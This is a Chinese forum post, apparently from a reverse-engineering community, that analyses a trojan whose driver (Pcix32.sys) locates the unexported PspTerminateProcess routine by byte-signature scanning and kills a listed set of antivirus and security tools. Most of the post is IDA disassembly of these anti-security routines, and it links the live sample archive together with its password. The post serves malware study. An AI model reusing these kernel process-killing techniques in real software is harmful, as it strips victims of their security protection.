昨天发了一篇被判定为YJ贴了。。
,希望这篇不会。。。
马比较简单,适合新手。
先说一下行为:exe文件会释放Pcix32.sys amd32_.sys atax32.sys三个文件,但是后两个其实只是地一个的拷贝。sys文件负责监控各种杀毒软件和安全工具的启动,一旦发现,马上kill。
1。exe行为。
这里只写思路,详细请参考idb文件和自己跟,嘎嘎。
首先获取系统drivers目录,然后释放Pcix32.sys到这个目录下,期间拷贝各种副本。
还有,exe会检测是否有还原精灵,有的话会做相应处理,不过本人太懒。。懒得搭环境,这部分有兴趣的跟一下吧:)
如果没有还原精灵的话,就加载驱动。
最后有一个注入的行为,也没仔细跟:D
2。sys
这个是感兴趣的,贴代码:
.text:00010B34 lea eax, [ebp+SystemInformation]
.text:00010B37 push eax ; ReturnLength
.text:00010B38 push 0 ; SystemInformationLength
.text:00010B3A push eax ; SystemInformation
.text:00010B3B push 0Bh ; SystemInformationClass
.text:00010B3D mov edi, ds:__imp_ZwQuerySystemInformation
.text:00010B43 call edi ; __imp_ZwQuerySystemInformation
.text:00010B45 push [ebp+SystemInformation] ; NumberOfBytes
.text:00010B48 push 1 ; PoolType
.text:00010B4A call ds:ExAllocatePool
获得系统各种信息。。。
text:00010B5A push 0 ; ReturnLength
.text:00010B5C push [ebp+SystemInformation] ; SystemInformationLength
.text:00010B5F push esi ; SystemInformation
.text:00010B60 push 0Bh ; SystemInformationClass
.text:00010B62 call edi ; __imp_ZwQuerySystemInformation
.text:00010B64 test eax, eax
.text:00010B66 jl short loc_10BDE
.text:00010B68 mov ebx, [esi+0Ch]
.text:00010B6B mov edi, [esi+10h]
.text:00010B6E add edi, ebx
.text:00010B70 push 0 ; Tag
.text:00010B72 push esi ; P
.text:00010B73 call ds:ExFreePoolWithTag
.text:00010B79 mov esi, ebx
.text:00010B7B
.text:00010B7B loc_10B7B: ; CODE XREF: sub_10B28+BFj
.text:00010B7B cmp esi, edi
.text:00010B7D ja short loc_10BDE
.text:00010B7F push esi ; VirtualAddress
.text:00010B80 call ds:MmIsAddressValid
.text:00010B86 test al, al
.text:00010B88 jz short loc_10BE6
.text:00010B8A lea ebx, [esi+4]
.text:00010B8D push ebx ; VirtualAddress
.text:00010B8E call ds:MmIsAddressValid;测试地址是否可用,防止BSOD。。。
.text:00010B94 test al, al
.text:00010B96 jz short loc_10BE6
.text:00010B98 mov eax, 8B55FF8Bh:google一下这个值吧,发现是PspTerminateProcess
.text:00010B9D cmp [esi], eax
.text:00010B9F jnz short loc_10BE6
.text:00010BA1 mov eax, 0CEC83ECh
.text:00010BA6 cmp [ebx], eax
.text:00010BA8 jnz short loc_10BE6
.text:00010BAA mov eax, 0FFF84D83h
.text:00010BAF cmp [esi+8], eax
.text:00010BB2 jnz short loc_10BE6
.text:00010BB4 mov eax, 7D8B5756h
.text:00010BB9 cmp [esi+0Ch], eax
.text:00010BBC jnz short loc_10BE6
.text:00010BBE and [ebp+ms_exc.disabled], 0
.text:00010BC2 mov [ebp+var_20], esi
.text:00010BC5 mov [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010BCC mov eax, esi;保存函数地址
作者考虑的还挺周全。。。如果木有找到这个函数:
.text:00010A40 call _GetPspTerminateProcessAddress
.text:00010A45 mov PspTerminateProcess, eax
.text:00010A4A test eax, eax
.text:00010A4C jnz short loc_10A8F
.text:00010A4E call sub_10568
就去找PsTerminateProcess这个东东:
sub_10568 proc near ; CODE XREF: sub_10A30+1Ep
.text:00010568 push offset aPsterminatesys ; "PsTerminateSystemThread"
.text:0001056D push sysInfo
.text:00010573 call sub_10486
.text:00010578 xor ecx, ecx
.text:0001057A
.text:0001057A loc_1057A: ; CODE XREF: sub_10568+28j
.text:0001057A cmp byte ptr [eax], 0FFh;0xFF7508,即psterminateprocess
.text:0001057D jnz short loc_1058B
.text:0001057F cmp byte ptr [eax+1], 75h
.text:00010583 jnz short loc_1058B
.text:00010585 cmp byte ptr [eax+2], 8
.text:00010589 jz short loc_10595
。。。。
.text:00010595 loc_10595: ; CODE XREF: sub_10568+21j
.text:00010595 add eax, 5
.text:00010598 mov ecx, [eax]
.text:0001059A lea eax, [ecx+eax+4]
.text:0001059E retn
期间还有两个函数,时间仓促,没细看,就不说了。。。。
下面是find and kill函数,负责干坏事的元凶:
.text:00010CEC mov edi, edi
.text:00010CEE push ebp
.text:00010CEF mov ebp, esp
.text:00010CF1 sub esp, 6A4h
.text:00010CF7 and [ebp+var_C], 0
.text:00010CFB push ebx
.text:00010CFC push esi
.text:00010CFD push edi
.text:00010CFE mov esi, 0FFFFh
.text:00010D03 push esi ; NumberOfBytes
.text:00010D04 mov ebx, offset aKvmonxp_exe ; "KVMonXp.exe"
.text:00010D09 push 1 ; PoolType
.text:00010D0B mov [ebp+SourceString], offset aNod32krn_exe ; "nod32krn.exe"
.text:00010D15 mov [ebp+var_C0], offset aEgui_exe ; "egui.exe"
.text:00010D1F mov [ebp+var_BC], offset aEkrn_exe ; "ekrn.exe"
.text:00010D29 mov [ebp+var_B8], offset a360tray_exe ; "360tray.exe"
.text:00010D33 mov [ebp+var_B4], offset a360safe_exe ; "360Safe.exe"
.text:00010D3D mov [ebp+var_B0], offset aSafeboxtray_ex ; "safeboxTray.exe"
.text:00010D47 mov [ebp+var_AC], offset a360safebox_exe ; "360safebox.exe"
.text:00010D51 mov [ebp+var_A8], offset a360sd_exe ; "360sd.exe"
.text:00010D5B mov [ebp+var_A4], offset aZhudongfangyu_ ; "ZhuDongFangYu.exe"
.text:00010D65 mov [ebp+var_A0], offset a360rp_exe ; "360rp.exe"
.text:00010D6F mov [ebp+var_9C], offset a360sdupd_exe ; "360sdupd.exe"
.text:00010D79 mov [ebp+var_98], offset a360rps_exe ; "360rps.exe"
.text:00010D83 mov [ebp+var_94], offset a3_0 ; "3"
.text:00010D8D mov [ebp+var_90], offset aO ; "O"
.text:00010D97 mov [ebp+var_8C], offset asc_11BDE ; "L"
.text:00010DA1 mov [ebp+var_88], offset aK_8 ; "K"
.text:00010DAB mov [ebp+var_84], offset aK_7 ; "k"
.text:00010DB5 mov [ebp+var_80], offset aK_6 ; "k"
.text:00010DBC mov [ebp+var_7C], offset aK_5 ; "k"
.text:00010DC3 mov [ebp+var_78], offset aK_4 ; "k"
.text:00010DCA mov [ebp+var_74], offset aU ; "u"
.text:00010DD1 mov [ebp+var_70], offset aKxescore_exe ; "kxescore.exe"
.text:00010DD8 mov [ebp+var_6C], offset aKxetray_exe ; "kxetray.exe"
.text:00010DDF mov [ebp+var_68], offset aK_3 ; "K"
.text:00010DE6 mov [ebp+var_64], offset aK ; "K"
.text:00010DED mov [ebp+var_60], offset aGuiyingfix_exe ; "guiyingfix.exe"
.text:00010DF4 mov [ebp+var_5C], offset aRavmond_exe ; "RavMonD.exe"
.text:00010DFB mov [ebp+var_58], offset aR_3 ; "R"
.text:00010E02 mov [ebp+var_54], offset aR ; "R"
.text:00010E09 mov [ebp+var_50], offset aRegguide_exe ; "RegGuide.exe"
.text:00010E10 mov [ebp+var_4C], offset aR_0 ; "R"
.text:00010E17 mov [ebp+var_48], offset aRscopy_exe ; "RsCopy.exe"
.text:00010E1E mov [ebp+var_44], offset aRav_exe ; "Rav.exe"
.text:00010E25 mov [ebp+var_40], offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010E2C mov [ebp+var_3C], offset word_119F2
.text:00010E33 mov [ebp+var_38], ebx
.text:00010E36 mov [ebp+var_34], offset aA ; "a"
.text:00010E3D mov [ebp+var_30], offset aIcesword_exe ; "IceSword.exe"
.text:00010E44 mov [ebp+var_2C], offset aS_0 ; "S"
.text:00010E4B mov [ebp+var_28], offset aR_1 ; "r"
.text:00010E52 mov [ebp+var_24], offset aKnownsvr_exe ; "knownsvr.exe"
.text:00010E59 mov [ebp+var_20], offset aR_2 ; "r"
.text:00010E60 mov [ebp+var_1C], offset aKnsdtray_exe ; "knsdtray.exe"
.text:00010E67 mov [ebp+var_18], offset aK_2 ; "k"
.text:00010E6E mov [ebp+var_14], offset aK_1 ; "k"
.text:00010E75 mov [ebp+var_10], offset aK_0 ; "k"
.text:00010E7C call ds:ExAllocatePool
.text:00010E82 mov edi, eax
.text:00010E84 mov [ebp+P], edi
.text:00010E87 test edi, edi
.text:00010E89 jz loc_10FA5
.text:00010E8F push offset Format ; "enter findprocessandkill\n"
.text:00010E94 call DbgPrint
.text:00010E99 pop ecx
.text:00010E9A lea eax, [ebp+ReturnLength]
.text:00010E9D push eax ; ReturnLength
.text:00010E9E push esi ; SystemInformationLength
.text:00010E9F push edi ; SystemInformation
.text:00010EA0 push 5 ; SystemInformationClass
.text:00010EA2 call ds:__imp_ZwQuerySystemInformation
.text:00010EA8 mov esi, edi
.text:00010EAA
.text:00010EAA loc_10EAA: ; CODE XREF: _FindAddKillProcess+2A8j
.text:00010EAA add esi, [esi]
.text:00010EAC xor eax, eax
.text:00010EAE lea edi, [esi+38h]
.text:00010EB1 cmp [edi], ax
.text:00010EB4 jz loc_10F91
.text:00010EBA mov [ebp+ReturnLength], eax
.text:00010EBD
.text:00010EBD loc_10EBD: ; CODE XREF: _FindAddKillProcess+29Fj
.text:00010EBD push [ebp+eax*4+SourceString] ; SourceString
.text:00010EC4 lea eax, [ebp+eax*8+DestinationString]
.text:00010ECB push eax ; DestinationString
.text:00010ECC call ds:RtlInitUnicodeString
.text:00010ED2 mov eax, [ebp+ReturnLength]
.text:00010ED5 push 1 ; CaseInSensitive
.text:00010ED7 lea eax, [ebp+eax*8+DestinationString]
.text:00010EDE push eax ; String2
.text:00010EDF push edi ; String1
.text:00010EE0 call ds:RtlCompareUnicodeString
.text:00010EE6 test eax, eax
.text:00010EE8 jnz loc_10F7C
.text:00010EEE mov eax, [ebp+ReturnLength]
.text:00010EF1 push offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010EF6 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010EFD call ds:_wcsicmp
.text:00010F03 pop ecx
.text:00010F04 pop ecx
.text:00010F05 test eax, eax
.text:00010F07 jz short loc_10F75
.text:00010F09 mov eax, [ebp+ReturnLength]
.text:00010F0C push offset word_119F2 ; wchar_t *
.text:00010F11 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F18 call ds:_wcsicmp
.text:00010F1E pop ecx
.text:00010F1F pop ecx
.text:00010F20 test eax, eax
.text:00010F22 jz short loc_10F75
.text:00010F24 mov eax, [ebp+ReturnLength]
.text:00010F27 push ebx ; wchar_t *
.text:00010F28 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F2F call ds:_wcsicmp
.text:00010F35 pop ecx
.text:00010F36 pop ecx
.text:00010F37 test eax, eax
.text:00010F39 jz short loc_10F75
.text:00010F3B mov eax, [ebp+ReturnLength]
.text:00010F3E push [ebp+eax*4+SourceString]
.text:00010F45 push offset aFindProcesssWs ; "Find Processs: %ws\n"
.text:00010F4A call DbgPrint
.text:00010F4F pop ecx
.text:00010F50 pop ecx
.text:00010F51 push dword ptr [esi+44h] ; PEPROCESS
.text:00010F54 call KillProcess
.text:00010F59 test eax, eax
.text:00010F5B jl short loc_10F7C
.text:00010F5D mov eax, [ebp+ReturnLength]
.text:00010F60 push [ebp+eax*4+SourceString]
.text:00010F67 push offset aKillProcesssWs ; "Kill Processs: %ws OK!\n"
.text:00010F6C call DbgPrint
.text:00010F71 pop ecx
.text:00010F72 pop ecx
.text:00010F73 jmp short loc_10F7C
.text:00010F75 ; ---------------------------------------------------------------------------
.text:00010F75
.text:00010F75 loc_10F75: ; CODE XREF: _FindAddKillProcess+21Bj
.text:00010F75 ; _FindAddKillProcess+236j ...
.text:00010F75 mov byte_1212C, 1
.text:00010F7C
.text:00010F7C loc_10F7C: ; CODE XREF: _FindAddKillProcess+1FCj
.text:00010F7C ; _FindAddKillProcess+26Fj ...
.text:00010F7C mov eax, [ebp+ReturnLength]
.text:00010F7F inc eax
.text:00010F80 cmp [ebp+eax*4+SourceString], 0
.text:00010F88 mov [ebp+ReturnLength], eax
.text:00010F8B jnz loc_10EBD
.text:00010F91
.text:00010F91 loc_10F91: ; CODE XREF: _FindAddKillProcess+1C8j
.text:00010F91 cmp dword ptr [esi], 0
.text:00010F94 jnz loc_10EAA
.text:00010F9A push 0 ; Tag
.text:00010F9C push [ebp+P] ; P
.text:00010F9F call ds:ExFreePoolWithTag
.text:00010FA5
.text:00010FA5 loc_10FA5: ; CODE XREF: _FindAddKillProcess+19Dj
.text:00010FA5 pop edi
.text:00010FA6 pop esi
.text:00010FA7 pop ebx
.text:00010FA8 leave
.text:00010FA9 retn
循环查找一堆安全工具,发现就kill~
呵呵,看一下怎么kill的吧:
KillProcess proc near ; CODE XREF: _FindAddKillProcess+268p
.text:00010CB0
.text:00010CB0 PEPROCESS = dword ptr 8
.text:00010CB0
.text:00010CB0 mov edi, edi
.text:00010CB2 push ebp
.text:00010CB3 mov ebp, esp
.text:00010CB5 lea eax, [ebp+PEPROCESS]
.text:00010CB8 push eax
.text:00010CB9 push [ebp+PEPROCESS]
.text:00010CBC call PsLookupProcessByProcessId
.text:00010CC1 test eax, eax
.text:00010CC3 jl short loc_10CCE
.text:00010CC5 mov ecx, [ebp+PEPROCESS] ; Object
.text:00010CC8 call ds:ObfDereferenceObject
.text:00010CCE
.text:00010CCE loc_10CCE: ; CODE XREF: KillProcess+13j
.text:00010CCE push [ebp+PEPROCESS]
.text:00010CD1 call sub_10C4E
.text:00010CD6 test eax, eax
.text:00010CD8 jl short loc_10CDE
.text:00010CDA xor eax, eax
.text:00010CDC jmp short loc_10CE3
.text:00010CDE ; ---------------------------------------------------------------------------
.text:00010CDE
.text:00010CDE loc_10CDE: ; CODE XREF: KillProcess+28j
.text:00010CDE mov eax, 0C0000001h
.text:00010CE3
.text:00010CE3 loc_10CE3: ; CODE XREF: KillProcess+2Cj
.text:00010CE3 pop ebp
.text:00010CE4 retn 4
.text:00010CE4 KillProcess endp
然后是00010CD1的调用:
.text:00010C50 push offset unk_12088
.text:00010C55 call __SEH_prolog4
.text:00010C5A xor edi, edi
.text:00010C5C mov [ebp+var_1C], edi
.text:00010C5F mov [ebp+ms_exc.disabled], edi
.text:00010C62 push edi ; Object
.text:00010C63
.text:00010C63 loc_10C63: ; CODE XREF: sub_10C4E+32j
.text:00010C63 push [ebp+PEPROCESS] ; PEPROCESS
.text:00010C66 call sub_10BEE
.text:00010C6B mov esi, eax
.text:00010C6D cmp esi, edi
.text:00010C6F jz short loc_10C99
.text:00010C71 mov [ebp+var_1C], edi
.text:00010C74 push edi
.text:00010C75 push esi
.text:00010C76 call PspTerminateProcess
.text:00010C7C mov [ebp+var_1C], eax
.text:00010C7F push esi
.text:00010C80 jmp short loc_10C63
.text:00010C82 ; ---------------------------------------------------------------------------
.text:00010C82
.text:00010C82 loc_10C82: ; DATA XREF: .rdata:0001209Co
.text:00010C82 mov eax, [ebp+ms_exc.exc_ptr]
.text:00010C85 mov eax, [eax]
.text:00010C87 mov eax, [eax]
.text:00010C89 mov [ebp+var_20], eax
.text:00010C8C xor eax, eax
.text:00010C8E inc eax
.text:00010C8F retn
.text:00010C90 ; ---------------------------------------------------------------------------
.text:00010C90
.text:00010C90 loc_10C90: ; DATA XREF: .rdata:000120A0o
.text:00010C90 mov esp, [ebp+ms_exc.old_esp]
.text:00010C93 mov eax, [ebp+var_20]
.text:00010C96 mov [ebp+var_1C], eax
.text:00010C99
.text:00010C99 loc_10C99: ; CODE XREF: sub_10C4E+21j
.text:00010C99 mov [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010CA0 mov eax, [ebp+var_1C]
.text:00010CA3 call __SEH_epilog4
.text:00010CA8 retn 4
.text:00010CA8 sub_10C4E endp
先到这里吧。。写的有点简略,大家见谅。。。
解压密码:pediy
Virus.rar
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法